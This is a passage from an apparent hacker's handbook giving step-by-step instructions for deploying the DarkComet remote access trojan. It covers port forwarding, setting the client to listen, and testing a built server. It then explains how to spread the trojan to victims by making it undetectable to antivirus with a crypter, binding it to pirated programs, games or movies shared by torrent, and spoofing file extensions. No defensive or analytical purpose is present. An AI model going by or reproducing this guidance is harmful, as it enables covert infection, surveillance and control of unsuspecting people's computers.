www.canyouseeme.org, enter your port numbe and click "Check Your Port" if you get Success then you are good to go and the port is open.
4‐ only if automatic forward didn't work.
If the previous method didn't work and you got a connection error from canyouseeme.org the refer to this website and choose your router model to port forward
your router manually (it is pretty easy): http://portforward.com/routers.htm
d) Listening
For connection on a specifique port all you need to do is go to Socket/Net tab and add a port (Same as in the previous step) and if you protected your server connection with a password (can be used only in Full editor mode) go to DarkComet‐RAT‐>Client setting‐> General settings and enter the password in "Traffic encryption merged key (password)"
e) Testing
Final step is to test if everything is working, so go create a server and remove and option that could harm your computer then run the server on your self and listen for connections, a seconds later your computer should appear in the "Users" tab.
To uninstall the RAT from your machine right click the user‐> Uninstall Server(s)
‐3‐ Spreading (Same as for the keylogger)
You will need to make it FUD (Fully UnDetectable) so that it is not detected and deleted by AV. To do this you will need a FUD crypter I did not include one with the book because a private FUD crypter will cost you money.
Your next step is to find some place to spread it one, usually torrents are the best find a new fresh prgram/game/crack/movie... download it, use a binder to bind the file with your RAT server and start spreading.
You can also use extension spoofer if you are spreading the server without binding it with another application, this will make it look less suspecious.